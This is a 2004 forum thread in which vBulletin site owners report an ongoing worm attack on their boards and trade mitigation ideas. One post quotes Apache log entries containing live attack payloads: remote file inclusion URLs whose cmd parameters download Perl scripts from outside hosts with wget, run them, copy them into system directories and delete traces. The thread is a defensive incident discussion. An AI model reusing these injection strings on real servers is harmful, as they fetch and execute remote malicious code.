Security Warning - How they killed my vb

**enzo81** · Sun 26 Dec '04, 2:03am

looks similar to mine

Weird Who's Online - vBulletin Community Forum

http://www.vbulletin.com/forum/showthread.php?t=124241

**Marc Smith** · Sun 26 Dec '04, 2:08am

You might want to edit your post and enclose the scripts in a 'code' block or something to keep it from making this page so wide.

I've been experiencing an 'attack' for over 36 hours now. I looked at my Apache httpd log and 2 or 3 a minute are coming in from all sorts of servers from everywhere (or is spoofing or whatever). I've seen as high as 400 requests an hour. I have done a few searches and in fact came here looking to see if this is happening to others with vBulletin.

I'm on a dedicated server and haven't had any latency problems - and I don't typically use 10% of my bandwidth each month so it doesn't appear to be a big problem right now.

I haven't experienced any database errors.

I'm on FreeBSD - Don't know if that makes a difference.

I'm assuming it's a variant of the recent phpBB Santy worm/bot (I think it's a perl script bot).

I'm also interested in whether others are seeing this activity.

So far I haven't seen any serious effect on my site or forum.

**Stadler** · Sun 26 Dec '04, 2:18am

Originally posted by akonze

Yesterday someone started to attack my server. After some research with my webhoster it turned out to be that vbulletin produced the problems. Using vbulletins loggin system I could catch thos two queries:

[...]

I am not very skilled with this, but it looks dangerous. Currently my board is down and I am not sure what I could do. I do not run any significant modifications on the board, so I guess this is a security hole in vbulletin itself.
Any help and advise would be appreciated.

Did they damage anything except causing overload on your server?

[Edit:]I tried to search for a similar newspost in english but I can only provide a link to heise.de (german slashdot equivalent): http://www.heise.de/newsticker/meldung/54623

However: The scripts on visualcoders.net have been removed.

**Marc Smith** · Sun 26 Dec '04, 2:35am

This is an example from my Apache httpd log:

Code:

66.135.32.219 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/t-9142.html HTTP/1.0" 200 5353 "-" "lwp-trivial/1.41"
 66.135.32.219 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/t-9142.html/?pda=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/spool/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/usr/local/apache/proxy/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;rm%20-rf%20/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/spool/mail/sess_189f0f0889555397a4de5485dd611111*%20/var/mail/sess_189f0f0889555397a4de5485dd611111*%20/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111* HTTP/1.1" 302 0 "-" "LWP::Simple/5.803"
 66.135.32.219 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/ HTTP/1.1" 200 8591 "-" "LWP::Simple/5.803"

This is one more example:

Code:

62.101.0.30 - - [26/Dec/2004:02:28:30 -0500] "GET /Forums/showthread.php?t=8514 HTTP/1.0" 200 52354 "-" "lwp-trivial/1.38"
 62.101.0.30 - - [26/Dec/2004:02:28:32 -0500] "GET /Forums/showthread.php?t=8514/index.php?s=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 52674 "-" "LWP::Simple/5.76"
 62.101.0.30 - - [26/Dec/2004:02:28:34 -0500] "GET /Forums/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19651 "-" "LWP::Simple/5.76"
 62.101.0.30 - - [26/Dec/2004:02:28:35 -0500] "GET /Forums/showthread.php?t=8514/forumdisplay.php?amp;f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;

**akonze** · Sun 26 Dec '04, 2:45am

Originally posted by Stadler

However: The scripts on visualcoders.net have been removed.

But this does not seem to remove the problem! When I route my domain to the forum again, this instantly generates a heavy load and traffic.

And before anyone asks: the server runs php 4.3.10 already.

**Marc Smith** · Sun 26 Dec '04, 2:51am

I don't think there's anything you can do to stop it, but if anyone has a way to stop it, I sure am interested. It's annoying even though it doesn't seem to be hurting anything.

**akonze** · Sun 26 Dec '04, 4:16am

Well, I first tried to catch all ip adresses used from the attacking bot and block them using .htaccess file (deny from ...). But this doesn't work very well. I easily caught hundreds of ip's and after blocking them, there came up another hundred.

I now did the following: I moved everything to a new domain name temporary and uploaded a simple index.html redirection file on the old domain.

I guess we can't do anything untill the worm is gone again...

**Marc Smith** · Sun 26 Dec '04, 4:29am

I checked IPs and they're from everywhere. Virginia, Texas, Poland, England - you name it. The Santy worm that affected phpBB was a Google issue - Used the Google search and Google shut that down. I'd like to know what this is coming from and how. It appears only a few of us here are experiencing the problem.

Also note in my two examples aboce there apears to be 2 different things attacking my site.

**Stadler** · Sun 26 Dec '04, 4:35am

Perhaps filtering these requests using mod_security (www.modsecurity.org) would help a bit. At least it should be worth a try I guess.

**Marc Smith** · Sun 26 Dec '04, 5:00am

I'm definitely not an expert at this stuff. I'll have to take a good look at modsecurity and see if it's within my expertise.

**boro_boy** · Sun 26 Dec '04, 6:05am

this is also happening to me, its used 13gig of bandwidth since yesterday. Has anyone found out how to stop it?

**Marc Smith** · Sun 26 Dec '04, 6:19am

I wish - Not that I've seen anywhere. Nor have I seen it mentioned on any virus / worm warning sites or such.

**Marc Smith** · Sun 26 Dec '04, 9:40am

See http://www.vbulletin.com/forum/showthread.php?t=124159 - There are 2 fixes there, it appears.

**boro_boy** · Sun 26 Dec '04, 9:50am

thank you

Security Warning - How they killed my vb

Security Warning - How they killed my vb

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment